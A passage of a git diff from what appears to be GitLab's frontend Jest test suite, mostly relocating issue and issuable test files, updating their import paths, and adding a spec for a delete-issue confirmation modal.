expect(ExperimentTracking).toHaveBeenCalledWith(INVITE_MEMBERS_IN_COMMENT); - expect(ExperimentTracking.prototype.event).toHaveBeenCalledWith('comment_invite_success'); - }); - - it('does not track invite for unknown source', () => { - eventHub.$emit('openModal', { inviteeType: 'members', source: 'unknown' }); - - clickInviteButton(); - - expect(ExperimentTracking).not.toHaveBeenCalledWith(INVITE_MEMBERS_IN_COMMENT); - }); - - it('does not track invite undefined source', () => { - eventHub.$emit('openModal', { inviteeType: 'members' }); - - clickInviteButton(); - - expect(ExperimentTracking).not.toHaveBeenCalledWith(INVITE_MEMBERS_IN_COMMENT); - }); - - it('tracks the view for areas_of_focus', () => { - eventHub.$emit('openModal', { inviteeType: 'members' }); + it('tracks the view for learn_gitlab source', () => { + eventHub.$emit('openModal', { inviteeType: 'members', source: LEARN_GITLAB }); - expect(ExperimentTracking).toHaveBeenCalledWith(MEMBER_AREAS_OF_FOCUS.name); - expect(ExperimentTracking.prototype.event).toHaveBeenCalledWith(MEMBER_AREAS_OF_FOCUS.view); - }); - - it('tracks the invite for areas_of_focus', () => { - eventHub.$emit('openModal', { inviteeType: 'members' }); - - clickInviteButton(); - - expect(ExperimentTracking).toHaveBeenCalledWith(MEMBER_AREAS_OF_FOCUS.name); - expect(ExperimentTracking.prototype.event).toHaveBeenCalledWith( - MEMBER_AREAS_OF_FOCUS.submit, - ); + expect(ExperimentTracking).toHaveBeenCalledWith(INVITE_MEMBERS_FOR_TASK.name); + expect(ExperimentTracking.prototype.event).toHaveBeenCalledWith(LEARN_GITLAB); }); }); }); diff --git a/spec/frontend/invite_members/components/invite_members_trigger_spec.js b/spec/frontend/invite_members/components/invite_members_trigger_spec.js index 3fce23f854c..429b6fad24a 100644 --- a/spec/frontend/invite_members/components/invite_members_trigger_spec.js +++ b/spec/frontend/invite_members/components/invite_members_trigger_spec.js @@ -1,6 +1,5 @@ import { GlButton, GlLink, GlIcon } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import ExperimentTracking from '~/experimentation/experiment_tracking'; import InviteMembersTrigger from '~/invite_members/components/invite_members_trigger.vue'; import eventHub from '~/invite_members/event_hub'; import { TRIGGER_ELEMENT_BUTTON, TRIGGER_ELEMENT_SIDE_NAV } from '~/invite_members/constants'; @@ -79,19 +78,6 @@ describe.each(triggerItems)('with triggerElement as %s', (triggerItem) => { }); describe('tracking', () => { - it('tracks on mounting', () => { - createComponent({ trackExperiment: '_track_experiment_' }); - - expect(ExperimentTracking).toHaveBeenCalledWith('_track_experiment_'); - expect(ExperimentTracking.prototype.event).toHaveBeenCalledWith('comment_invite_shown'); - }); - - it('does not track on mounting', () => { - createComponent(); - - expect(ExperimentTracking).not.toHaveBeenCalledWith('_track_experiment_'); - }); - it('does not add tracking attributes', () => { createComponent(); diff --git a/spec/frontend/issuable_bulk_update_sidebar/components/status_select_spec.js b/spec/frontend/issuable/bulk_update_sidebar/components/status_select_spec.js index 09dcb963154..8ecbf41ce56 100644 --- a/spec/frontend/issuable_bulk_update_sidebar/components/status_select_spec.js +++ b/spec/frontend/issuable/bulk_update_sidebar/components/status_select_spec.js @@ -1,7 +1,7 @@ import { GlDropdown, GlDropdownItem } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import StatusSelect from '~/issuable_bulk_update_sidebar/components/status_select.vue'; -import { ISSUE_STATUS_SELECT_OPTIONS } from '~/issuable_bulk_update_sidebar/constants'; +import StatusSelect from '~/issuable/bulk_update_sidebar/components/status_select.vue'; +import { ISSUE_STATUS_SELECT_OPTIONS } from '~/issuable/bulk_update_sidebar/constants'; describe('StatusSelect', () => { let wrapper; diff --git a/spec/frontend/vue_shared/components/issuable/issuable_header_warnings_spec.js b/spec/frontend/issuable/components/issuable_header_warnings_spec.js index ad8331afcff..c8380e42787 100644 --- a/spec/frontend/vue_shared/components/issuable/issuable_header_warnings_spec.js +++ b/spec/frontend/issuable/components/issuable_header_warnings_spec.js @@ -1,16 +1,15 @@ -import { createLocalVue } from '@vue/test-utils'; +import Vue from 'vue'; import Vuex from 'vuex'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import { createStore as createMrStore } from '~/mr_notes/stores'; import createIssueStore from '~/notes/stores'; -import IssuableHeaderWarnings from '~/vue_shared/components/issuable/issuable_header_warnings.vue'; +import IssuableHeaderWarnings from '~/issuable/components/issuable_header_warnings.vue'; const ISSUABLE_TYPE_ISSUE = 'issue'; const ISSUABLE_TYPE_MR = 'merge request'; -const localVue = createLocalVue(); -localVue.use(Vuex); +Vue.use(Vuex); describe('IssuableHeaderWarnings', () => { let wrapper; @@ -24,7 +23,6 @@ describe('IssuableHeaderWarnings', () => { const createComponent = ({ store, provide }) => { wrapper = shallowMountExtended(IssuableHeaderWarnings, { store, - localVue, provide, directives: { GlTooltip: createMockDirective(), diff --git a/spec/frontend/vue_shared/components/issue/issue_assignees_spec.js b/spec/frontend/issuable/components/issue_assignees_spec.js index f74b9b37197..713c8b1dfdd 100644 --- a/spec/frontend/vue_shared/components/issue/issue_assignees_spec.js +++ b/spec/frontend/issuable/components/issue_assignees_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; import { mockAssigneesList } from 'jest/boards/mock_data'; -import IssueAssignees from '~/vue_shared/components/issue/issue_assignees.vue'; +import IssueAssignees from '~/issuable/components/issue_assignees.vue'; import UserAvatarLink from '~/vue_shared/components/user_avatar/user_avatar_link.vue'; const TEST_CSS_CLASSES = 'test-classes'; diff --git a/spec/frontend/vue_shared/components/issue/issue_milestone_spec.js b/spec/frontend/issuable/components/issue_milestone_spec.js index 9a121050225..44416676180 100644 --- a/spec/frontend/vue_shared/components/issue/issue_milestone_spec.js +++ b/spec/frontend/issuable/components/issue_milestone_spec.js @@ -3,7 +3,7 @@ import { shallowMount } from '@vue/test-utils'; import Vue from 'vue'; import { mockMilestone } from 'jest/boards/mock_data'; -import IssueMilestone from '~/vue_shared/components/issue/issue_milestone.vue'; +import IssueMilestone from '~/issuable/components/issue_milestone.vue'; const createComponent = (milestone = mockMilestone) => { const Component = Vue.extend(IssueMilestone); diff --git a/spec/frontend/vue_shared/components/issue/related_issuable_item_spec.js b/spec/frontend/issuable/components/related_issuable_item_spec.js index 6ab828efebe..6ac4c9e8546 100644 --- a/spec/frontend/vue_shared/components/issue/related_issuable_item_spec.js +++ b/spec/frontend/issuable/components/related_issuable_item_spec.js @@ -2,7 +2,7 @@ import { mount } from '@vue/test-utils'; import { TEST_HOST } from 'helpers/test_constants'; import IssueDueDate from '~/boards/components/issue_due_date.vue'; import { formatDate } from '~/lib/utils/datetime_utility'; -import RelatedIssuableItem from '~/vue_shared/components/issue/related_issuable_item.vue'; +import RelatedIssuableItem from '~/issuable/components/related_issuable_item.vue'; import { defaultAssignees, defaultMilestone } from './related_issuable_mock_data'; describe('RelatedIssuableItem', () => { diff --git a/spec/frontend/vue_shared/components/issue/related_issuable_mock_data.js b/spec/frontend/issuable/components/related_issuable_mock_data.js index 6cdb945ec20..6cdb945ec20 100644 --- a/spec/frontend/vue_shared/components/issue/related_issuable_mock_data.js +++ b/spec/frontend/issuable/components/related_issuable_mock_data.js diff --git a/spec/frontend/issuable_form_spec.js b/spec/frontend/issuable/issuable_form_spec.js index c77fde4261e..321c61ead1e 100644 --- a/spec/frontend/issuable_form_spec.js +++ b/spec/frontend/issuable/issuable_form_spec.js @@ -1,6 +1,6 @@ import $ from 'jquery'; -import IssuableForm from '~/issuable_form'; +import IssuableForm from '~/issuable/issuable_form'; function createIssuable() { const instance = new IssuableForm($(document.createElement('form'))); diff --git a/spec/frontend/issuable/related_issues/components/related_issues_block_spec.js b/spec/frontend/issuable/related_issues/components/related_issues_block_spec.js index a450f912c4e..608fec45bbd 100644 --- a/spec/frontend/issuable/related_issues/components/related_issues_block_spec.js +++ b/spec/frontend/issuable/related_issues/components/related_issues_block_spec.js @@ -4,7 +4,7 @@ import { issuable1, issuable2, issuable3, -} from 'jest/vue_shared/components/issue/related_issuable_mock_data'; +} from 'jest/issuable/components/related_issuable_mock_data'; import RelatedIssuesBlock from '~/related_issues/components/related_issues_block.vue'; import { linkedIssueTypesMap, diff --git a/spec/frontend/issuable/related_issues/components/related_issues_list_spec.js b/spec/frontend/issuable/related_issues/components/related_issues_list_spec.js index ffd9683cd6b..c7df3755e88 100644 --- a/spec/frontend/issuable/related_issues/components/related_issues_list_spec.js +++ b/spec/frontend/issuable/related_issues/components/related_issues_list_spec.js @@ -5,7 +5,7 @@ import { issuable3, issuable4, issuable5, -} from 'jest/vue_shared/components/issue/related_issuable_mock_data'; +} from 'jest/issuable/components/related_issuable_mock_data'; import IssueDueDate from '~/boards/components/issue_due_date.vue'; import RelatedIssuesList from '~/related_issues/components/related_issues_list.vue'; import { PathIdSeparator } from '~/related_issues/constants'; diff --git a/spec/frontend/issuable/related_issues/components/related_issues_root_spec.js b/spec/frontend/issuable/related_issues/components/related_issues_root_spec.js index 3099e0b639b..01de4da7900 100644 --- a/spec/frontend/issuable/related_issues/components/related_issues_root_spec.js +++ b/spec/frontend/issuable/related_issues/components/related_issues_root_spec.js @@ -5,7 +5,7 @@ import { defaultProps, issuable1, issuable2, -} from 'jest/vue_shared/components/issue/related_issuable_mock_data'; +} from 'jest/issuable/components/related_issuable_mock_data'; import createFlash from '~/flash'; import axios from '~/lib/utils/axios_utils'; import RelatedIssuesRoot from '~/related_issues/components/related_issues_root.vue'; diff --git a/spec/frontend/issuable/related_issues/stores/related_issues_store_spec.js b/spec/frontend/issuable/related_issues/stores/related_issues_store_spec.js index ada1c44560f..4a6bd832fba 100644 --- a/spec/frontend/issuable/related_issues/stores/related_issues_store_spec.js +++ b/spec/frontend/issuable/related_issues/stores/related_issues_store_spec.js @@ -4,7 +4,7 @@ import { issuable3, issuable4, issuable5, -} from 'jest/vue_shared/components/issue/related_issuable_mock_data'; +} from 'jest/issuable/components/related_issuable_mock_data'; import RelatedIssuesStore from '~/related_issues/stores/related_issues_store'; describe('RelatedIssuesStore', () => { diff --git a/spec/frontend/issuable_spec.js b/spec/frontend/issuable_spec.js deleted file mode 100644 index e0bd7b802c9..00000000000 --- a/spec/frontend/issuable_spec.js +++ /dev/null @@ -1,22 +0,0 @@ -import issuableInitBulkUpdateSidebar from '~/issuable_bulk_update_sidebar/issuable_init_bulk_update_sidebar'; -import IssuableIndex from '~/issuable_index'; - -describe('Issuable', () => { - describe('initBulkUpdate', () => { - it('should not set bulkUpdateSidebar', () => { - new IssuableIndex('issue_'); // eslint-disable-line no-new - - expect(issuableInitBulkUpdateSidebar.bulkUpdateSidebar).toBeNull(); - }); - - it('should set bulkUpdateSidebar', () => { - const element = document.createElement('div'); - element.classList.add('issues-bulk-update'); - document.body.appendChild(element); - - new IssuableIndex('issue_'); // eslint-disable-line no-new - - expect(issuableInitBulkUpdateSidebar.bulkUpdateSidebar).toBeDefined(); - }); - }); -}); diff --git a/spec/frontend/issue_spec.js b/spec/frontend/issues/issue_spec.js index 952ef54d286..8a089b372ff 100644 --- a/spec/frontend/issue_spec.js +++ b/spec/frontend/issues/issue_spec.js @@ -1,7 +1,7 @@ import { getByText } from '@testing-library/dom'; import MockAdapter from 'axios-mock-adapter'; import { EVENT_ISSUABLE_VUE_APP_CHANGE } from '~/issuable/constants'; -import Issue from '~/issue'; +import Issue from '~/issues/issue'; import axios from '~/lib/utils/axios_utils'; describe('Issue', () => { diff --git a/spec/frontend/issuable_type_selector/components/__snapshots__/info_popover_spec.js.snap b/spec/frontend/issues/new/components/__snapshots__/type_popover_spec.js.snap index 196fbb8a643..881dcda126f 100644 --- a/spec/frontend/issuable_type_selector/components/__snapshots__/info_popover_spec.js.snap +++ b/spec/frontend/issues/new/components/__snapshots__/type_popover_spec.js.snap @@ -1,12 +1,12 @@ // Jest Snapshot v1, https://goo.gl/fbAQLP -exports[`Issuable type info popover renders 1`] = ` +exports[`Issue type info popover renders 1`] = ` <span id="popovercontainer" > <gl-icon-stub class="gl-ml-5 gl-text-gray-500" - id="issuable-type-info" + id="issue-type-info" name="question-o" size="16" /> @@ -14,7 +14,7 @@ exports[`Issuable type info popover renders 1`] = ` <gl-popover-stub container="popovercontainer" cssclasses="" - target="issuable-type-info" + target="issue-type-info" title="Issue types" triggers="focus hover" > diff --git a/spec/frontend/issuable_suggestions/components/item_spec.js b/spec/frontend/issues/new/components/title_suggestions_item_spec.js index 45f96103e3e..5eb30b52de5 100644 --- a/spec/frontend/issuable_suggestions/components/item_spec.js +++ b/spec/frontend/issues/new/components/title_suggestions_item_spec.js @@ -1,15 +1,15 @@ import { GlTooltip, GlLink, GlIcon } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { TEST_HOST } from 'helpers/test_constants'; -import Suggestion from '~/issuable_suggestions/components/item.vue'; +import TitleSuggestionsItem from '~/issues/new/components/title_suggestions_item.vue'; import UserAvatarImage from '~/vue_shared/components/user_avatar/user_avatar_image.vue'; import mockData from '../mock_data'; -describe('Issuable suggestions suggestion component', () => { +describe('Issue title suggestions item component', () => { let wrapper; function createComponent(suggestion = {}) { - wrapper = shallowMount(Suggestion, { + wrapper = shallowMount(TitleSuggestionsItem, { propsData: { suggestion: { ...mockData(), diff --git a/spec/frontend/issuable_suggestions/components/app_spec.js b/spec/frontend/issues/new/components/title_suggestions_spec.js index fb8ef00567c..984d0c9d25b 100644 --- a/spec/frontend/issuable_suggestions/components/app_spec.js +++ b/spec/frontend/issues/new/components/title_suggestions_spec.js @@ -1,12 +1,12 @@ import { shallowMount } from '@vue/test-utils'; -import App from '~/issuable_suggestions/components/app.vue'; -import Suggestion from '~/issuable_suggestions/components/item.vue'; +import TitleSuggestions from '~/issues/new/components/title_suggestions.vue'; +import TitleSuggestionsItem from '~/issues/new/components/title_suggestions_item.vue'; -describe('Issuable suggestions app component', () => { +describe('Issue title suggestions component', () => { let wrapper; function createComponent(search = 'search') { - wrapper = shallowMount(App, { + wrapper = shallowMount(TitleSuggestions, { propsData: { search, projectPath: 'project', @@ -77,7 +77,7 @@ describe('Issuable suggestions app component', () => { wrapper.setData(data); return wrapper.vm.$nextTick(() => { - expect(wrapper.findAll(Suggestion).length).toBe(2); + expect(wrapper.findAll(TitleSuggestionsItem).length).toBe(2); }); }); diff --git a/spec/frontend/issuable_type_selector/components/info_popover_spec.js b/spec/frontend/issues/new/components/type_popover_spec.js index 975977ffeb3..fe3d5207516 100644 --- a/spec/frontend/issuable_type_selector/components/info_popover_spec.js +++ b/spec/frontend/issues/new/components/type_popover_spec.js @@ -1,11 +1,11 @@ import { shallowMount } from '@vue/test-utils'; -import InfoPopover from '~/issuable_type_selector/components/info_popover.vue'; +import TypePopover from '~/issues/new/components/type_popover.vue'; -describe('Issuable type info popover', () => { +describe('Issue type info popover', () => { let wrapper; function createComponent() { - wrapper = shallowMount(InfoPopover); + wrapper = shallowMount(TypePopover); } afterEach(() => { diff --git a/spec/frontend/issuable_suggestions/mock_data.js b/spec/frontend/issues/new/mock_data.js index 74b569d9833..74b569d9833 100644 --- a/spec/frontend/issuable_suggestions/mock_data.js +++ b/spec/frontend/issues/new/mock_data.js diff --git a/spec/frontend/related_merge_requests/components/related_merge_requests_spec.js b/spec/frontend/issues/related_merge_requests/components/related_merge_requests_spec.js index 486fb699275..4d780a674be 100644 --- a/spec/frontend/related_merge_requests/components/related_merge_requests_spec.js +++ b/spec/frontend/issues/related_merge_requests/components/related_merge_requests_spec.js @@ -2,9 +2,9 @@ import { mount, createLocalVue } from '@vue/test-utils'; import MockAdapter from 'axios-mock-adapter'; import mockData from 'test_fixtures/issues/related_merge_requests.json'; import axios from '~/lib/utils/axios_utils'; -import RelatedMergeRequests from '~/related_merge_requests/components/related_merge_requests.vue'; -import createStore from '~/related_merge_requests/store/index'; -import RelatedIssuableItem from '~/vue_shared/components/issue/related_issuable_item.vue'; +import RelatedMergeRequests from '~/issues/related_merge_requests/components/related_merge_requests.vue'; +import createStore from '~/issues/related_merge_requests/store/index'; +import RelatedIssuableItem from '~/issuable/components/related_issuable_item.vue'; const API_ENDPOINT = '/api/v4/projects/2/issues/33/related_merge_requests'; const localVue = createLocalVue(); diff --git a/spec/frontend/related_merge_requests/store/actions_spec.js b/spec/frontend/issues/related_merge_requests/store/actions_spec.js index 3bd07c34b6f..5f232fee09b 100644 --- a/spec/frontend/related_merge_requests/store/actions_spec.js +++ b/spec/frontend/issues/related_merge_requests/store/actions_spec.js @@ -2,8 +2,8 @@ import MockAdapter from 'axios-mock-adapter'; import testAction from 'helpers/vuex_action_helper'; import createFlash from '~/flash'; import axios from '~/lib/utils/axios_utils'; -import * as actions from '~/related_merge_requests/store/actions'; -import * as types from '~/related_merge_requests/store/mutation_types'; +import * as actions from '~/issues/related_merge_requests/store/actions'; +import * as types from '~/issues/related_merge_requests/store/mutation_types'; jest.mock('~/flash'); diff --git a/spec/frontend/related_merge_requests/store/mutations_spec.js b/spec/frontend/issues/related_merge_requests/store/mutations_spec.js index 436c7dca6ce..0e3d26b3879 100644 --- a/spec/frontend/related_merge_requests/store/mutations_spec.js +++ b/spec/frontend/issues/related_merge_requests/store/mutations_spec.js @@ -1,5 +1,5 @@ -import * as types from '~/related_merge_requests/store/mutation_types'; -import mutations from '~/related_merge_requests/store/mutations'; +import * as types from '~/issues/related_merge_requests/store/mutation_types'; +import mutations from '~/issues/related_merge_requests/store/mutations'; describe('RelatedMergeRequests Store Mutations', () => { describe('SET_INITIAL_STATE', () => { diff --git a/spec/frontend/sentry_error_stack_trace/components/sentry_error_stack_trace_spec.js b/spec/frontend/issues/sentry_error_stack_trace/components/sentry_error_stack_trace_spec.js index 772d6903052..5a51ae3cfe0 100644 --- a/spec/frontend/sentry_error_stack_trace/components/sentry_error_stack_trace_spec.js +++ b/spec/frontend/issues/sentry_error_stack_trace/components/sentry_error_stack_trace_spec.js @@ -2,7 +2,7 @@ import { GlLoadingIcon } from '@gitlab/ui'; import { createLocalVue, shallowMount } from '@vue/test-utils'; import Vuex from 'vuex'; import Stacktrace from '~/error_tracking/components/stacktrace.vue'; -import SentryErrorStackTrace from '~/sentry_error_stack_trace/components/sentry_error_stack_trace.vue'; +import SentryErrorStackTrace from '~/issues/sentry_error_stack_trace/components/sentry_error_stack_trace.vue'; const localVue = createLocalVue(); localVue.use(Vuex); diff --git a/spec/frontend/issue_show/components/app_spec.js b/spec/frontend/issues/show/components/app_spec.js index e32215b4aa6..02db82b84dc 100644 --- a/spec/frontend/issue_show/components/app_spec.js +++ b/spec/frontend/issues/show/components/app_spec.js @@ -4,12 +4,13 @@ import { nextTick } from 'vue'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import { mountExtended } from 'helpers/vue_test_utils_helper'; import '~/behaviors/markdown/render_gfm'; -import IssuableApp from '~/issue_show/components/app.vue'; -import DescriptionComponent from '~/issue_show/components/description.vue'; -import IncidentTabs from '~/issue_show/components/incidents/incident_tabs.vue'; -import PinnedLinks from '~/issue_show/components/pinned_links.vue'; -import { IssuableStatus, IssuableStatusText, POLLING_DELAY } from '~/issue_show/constants'; -import eventHub from '~/issue_show/event_hub'; +import { IssuableStatus, IssuableStatusText } from '~/issues/constants'; +import IssuableApp from '~/issues/show/components/app.vue'; +import DescriptionComponent from '~/issues/show/components/description.vue'; +import IncidentTabs from '~/issues/show/components/incidents/incident_tabs.vue'; +import PinnedLinks from '~/issues/show/components/pinned_links.vue'; +import { POLLING_DELAY } from '~/issues/show/constants'; +import eventHub from '~/issues/show/event_hub'; import axios from '~/lib/utils/axios_utils'; import { visitUrl } from '~/lib/utils/url_utility'; import { @@ -25,7 +26,7 @@ function formatText(text) { } jest.mock('~/lib/utils/url_utility'); -jest.mock('~/issue_show/event_hub'); +jest.mock('~/issues/show/event_hub'); const REALTIME_REQUEST_STACK = [initialRequest, secondRequest]; @@ -325,44 +326,6 @@ describe('Issuable output', () => { }); }); - describe('deleteIssuable', () => { - it('changes URL when deleted', () => { - jest.spyOn(wrapper.vm.service, 'deleteIssuable').mockResolvedValue({ - data: { - web_url: '/test', - }, - }); - - return wrapper.vm.deleteIssuable().then(() => { - expect(visitUrl).toHaveBeenCalledWith('/test'); - }); - }); - - it('stops polling when deleting', () => { - const spy = jest.spyOn(wrapper.vm.poll, 'stop'); - jest.spyOn(wrapper.vm.service, 'deleteIssuable').mockResolvedValue({ - data: { - web_url: '/test', - }, - }); - - return wrapper.vm.deleteIssuable().then(() => { - expect(spy).toHaveBeenCalledWith(); - }); - }); - - it('closes form on error', () => { - jest.spyOn(wrapper.vm.service, 'deleteIssuable').mockRejectedValue(); - - return wrapper.vm.deleteIssuable().then(() => { - expect(eventHub.$emit).not.toHaveBeenCalledWith('close.form'); - expect(document.querySelector('.flash-container .flash-text').innerText.trim()).toBe( - 'Error deleting issue', - ); - }); - }); - }); - describe('updateAndShowForm', () => { it('shows locked warning if form is open & data is different', () => { return wrapper.vm diff --git a/spec/frontend/issues/show/components/delete_issue_modal_spec.js b/spec/frontend/issues/show/components/delete_issue_modal_spec.js new file mode 100644 index 00000000000..97a091a1748 --- /dev/null +++ b/spec/frontend/issues/show/components/delete_issue_modal_spec.js @@ -0,0 +1,108 @@ +import { GlModal } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import DeleteIssueModal from '~/issues/show/components/delete_issue_modal.vue'; + +jest.mock('~/lib/utils/csrf', () => ({ token: 'mock-csrf-token' })); + +describe('DeleteIssueModal component', () => { + let wrapper; + + const defaultProps = { + issuePath: 'gitlab-org/gitlab-test/-/issues/1', + issueType: 'issue', + modalId: 'modal-id', + title: 'Delete issue', + }; + + const findForm = () => wrapper.find('form'); + const findModal = () => wrapper.findComponent(GlModal); + + const mountComponent = (props = {}) => + shallowMount(DeleteIssueModal, { propsData: { ...defaultProps, ...props } }); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('modal', () => { + it('renders', () => { + wrapper = mountComponent(); + + expect(findModal().props()).toMatchObject({ + actionCancel: DeleteIssueModal.actionCancel, + actionPrimary: { + attributes: { variant: 'danger' }, + text: defaultProps.title, + }, + modalId: defaultProps.modalId, + size: 'sm', + title: defaultProps.title, + }); + }); + + describe('when "primary" event is emitted', () => { + let formSubmitSpy; + + beforeEach(() => { + wrapper = mountComponent(); + formSubmitSpy = jest.spyOn(wrapper.vm.$refs.form, 'submit'); + findModal().vm.$emit('primary'); + }); + + it('"delete" event is emitted by DeleteIssueModal', () => { + expect(wrapper.emitted('delete')).toEqual([[]]); + }); + + it('submits the form', () => { + expect(formSubmitSpy).toHaveBeenCalled(); + }); + }); + }); + + describe('form', () => { + beforeEach(() => { + wrapper = mountComponent(); + }); + + it('renders with action and method', () => { + expect(findForm().attributes()).toEqual({ + action: defaultProps.issuePath, + method: 'post', + }); + }); + + it('contains form data', () => { + const formData = wrapper.findAll('input').wrappers.reduce( + (acc, input) => ({ + ...acc, + [input.element.name]: input.element.value, + }), + {}, + ); + + expect(formData).toEqual({ + _method: 'delete', + authenticity_token: 'mock-csrf-token', + destroy_confirm: 'true', + }); + }); + }); + + describe('body text', () => { + describe('when issue type is not epic', () => { + it('renders', () => { + wrapper = mountComponent(); + + expect(findForm().text()).toBe('Issue will be removed! Are you sure?'); + }); + }); + + describe('when issue type is epic', () => { + it('renders', () => { + wrapper = mountComponent({ issueType: 'epic' }); + + expect(findForm().text()).toBe('Delete this epic and all descendants?'); + }); + }); + }); +}); diff --git a/spec/frontend/issue_show/components/description_spec.js b/spec/frontend/issues/show/components/description_spec.js index bdcc82cab81..d39e00b9c9e 100644 --- a/spec/frontend/issue_show/components/description_spec.js +++ b/spec/frontend/issues/show/components/description_spec.js @@ -3,7 +3,7 @@ import Vue from 'vue'; import '~/behaviors/markdown/render_gfm'; import { TEST_HOST } from 'helpers/test_constants'; import mountComponent from 'helpers/vue_mount_component_helper'; -import Description from '~/issue_show/components/description.vue'; +import Description from '~/issues/show/components/description.vue'; import TaskList from '~/task_list'; import { descriptionProps as props } from '../mock_data/mock_data'; diff --git a/spec/frontend/issue_show/components/edit_actions_spec.js b/spec/frontend/issues/show/components/edit_actions_spec.js index 50c27cb5bda..79368023d76 100644 --- a/spec/frontend/issue_show/components/edit_actions_spec.js +++ b/spec/frontend/issues/show/components/edit_actions_spec.js @@ -1,25 +1,25 @@ -import { GlButton, GlModal } from '@gitlab/ui'; -import { createLocalVue } from '@vue/test-utils'; +import { GlButton } from '@gitlab/ui'; +import Vue from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; +import { mockTracking } from 'helpers/tracking_helper'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import IssuableEditActions from '~/issue_show/components/edit_actions.vue'; -import eventHub from '~/issue_show/event_hub'; - +import IssuableEditActions from '~/issues/show/components/edit_actions.vue'; +import DeleteIssueModal from '~/issues/show/components/delete_issue_modal.vue'; +import eventHub from '~/issues/show/event_hub'; import { getIssueStateQueryResponse, updateIssueStateQueryResponse, } from '../mock_data/apollo_mock'; -const localVue = createLocalVue(); -localVue.use(VueApollo); - describe('Edit Actions component', () => { let wrapper; let fakeApollo; let mockIssueStateData; + Vue.use(VueApollo); + const mockResolvers = { Query: { issueState() { @@ -43,6 +43,7 @@ describe('Edit Actions component', () => { title: 'GitLab Issue', }, canDestroy: true, + endpoint: 'gitlab-org/gitlab-test/-/issues/1', issuableType: 'issue', ...props, }, @@ -56,11 +57,7 @@ describe('Edit Actions component', () => { }); }; - async function deleteIssuable(localWrapper) { - localWrapper.findComponent(GlModal).vm.$emit('primary'); - } - - const findModal = () => wrapper.findComponent(GlModal); + const findModal = () => wrapper.findComponent(DeleteIssueModal); const findEditButtons = () => wrapper.findAllComponents(GlButton); const findDeleteButton = () => wrapper.findByTestId('issuable-delete-button'); const findSaveButton = () => wrapper.findByTestId('issuable-save-button'); @@ -123,9 +120,30 @@ describe('Edit Actions component', () => { }); }); - describe('renders create modal with the correct information', () => { - it('renders correct modal id', () => { - expect(findModal().attributes('modalid')).toBe(modalId); + describe('delete issue button', () => { + let trackingSpy; + + beforeEach(() => { + trackingSpy = mockTracking(undefined, wrapper.element, jest.spyOn); + }); + + it('tracks clicking on button', () => { + findDeleteButton().vm.$emit('click'); + + expect(trackingSpy).toHaveBeenCalledWith(undefined, 'click_button', { + label: 'delete_issue', + }); + }); + }); + + describe('delete issue modal', () => { + it('renders', () => { + expect(findModal().props()).toEqual({ + issuePath: 'gitlab-org/gitlab-test/-/issues/1', + issueType: 'Issue', + modalId, + title: 'Delete issue', + }); }); }); @@ -141,8 +159,8 @@ describe('Edit Actions component', () => { it('sends the `delete.issuable` event when clicking the delete confirm button', async () => { expect(eventHub.$emit).toHaveBeenCalledTimes(0); - await deleteIssuable(wrapper); - expect(eventHub.$emit).toHaveBeenCalledWith('delete.issuable', { destroy_confirm: true }); + findModal().vm.$emit('delete'); + expect(eventHub.$emit).toHaveBeenCalledWith('delete.issuable'); expect(eventHub.$emit).toHaveBeenCalledTimes(1); }); }); diff --git a/spec/frontend/issue_show/components/edited_spec.js b/spec/frontend/issues/show/components/edited_spec.js index a1683f060c0..8a8fe23230a 100644 --- a/spec/frontend/issue_show/components/edited_spec.js +++ b/spec/frontend/issues/show/components/edited_spec.js @@ -1,5 +1,5 @@ import Vue from 'vue'; -import edited from '~/issue_show/components/edited.vue'; +import edited from '~/issues/show/components/edited.vue'; function formatText(text) { return text.trim().replace(/\s\s+/g, ' '); diff --git a/spec/frontend/issue_show/components/fields/description_spec.js b/spec/frontend/issues/show/components/fields/description_spec.js index a50be30cf4c..3043c4c3673 100644 --- a/spec/frontend/issue_show/components/fields/description_spec.js +++ b/spec/frontend/issues/show/components/fields/description_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; -import DescriptionField from '~/issue_show/components/fields/description.vue'; -import eventHub from '~/issue_show/event_hub'; +import DescriptionField from '~/issues/show/components/fields/description.vue'; +import eventHub from '~/issues/show/event_hub'; import MarkdownField from '~/vue_shared/components/markdown/field.vue'; describe('Description field component', () => { diff --git a/spec/frontend/issue_show/components/fields/description_template_spec.js b/spec/frontend/issues/show/components/fields/description_template_spec.js index dc126c53f5e..abe2805e5b2 100644 --- a/spec/frontend/issue_show/components/fields/description_template_spec.js +++ b/spec/frontend/issues/show/components/fields/description_template_spec.js @@ -1,5 +1,5 @@ import Vue from 'vue'; -import descriptionTemplate from '~/issue_show/components/fields/description_template.vue'; +import descriptionTemplate from '~/issues/show/components/fields/description_template.vue'; describe('Issue description template component with templates as hash', () => { let vm; diff --git a/spec/frontend/issue_show/components/fields/title_spec.js b/spec/frontend/issues/show/components/fields/title_spec.js index 783ce9eb76c..efd0b6fbd30 100644 --- a/spec/frontend/issue_show/components/fields/title_spec.js +++ b/spec/frontend/issues/show/components/fields/title_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; -import TitleField from '~/issue_show/components/fields/title.vue'; -import eventHub from '~/issue_show/event_hub'; +import TitleField from '~/issues/show/components/fields/title.vue'; +import eventHub from '~/issues/show/event_hub'; describe('Title field component', () => { let wrapper; diff --git a/spec/frontend/issue_show/components/fields/type_spec.js b/spec/frontend/issues/show/components/fields/type_spec.js index 95ae6f37877..3ece10e70db 100644 --- a/spec/frontend/issue_show/components/fields/type_spec.js +++ b/spec/frontend/issues/show/components/fields/type_spec.js @@ -3,8 +3,8 @@ import { shallowMount, createLocalVue } from '@vue/test-utils'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import IssueTypeField, { i18n } from '~/issue_show/components/fields/type.vue'; -import { IssuableTypes } from 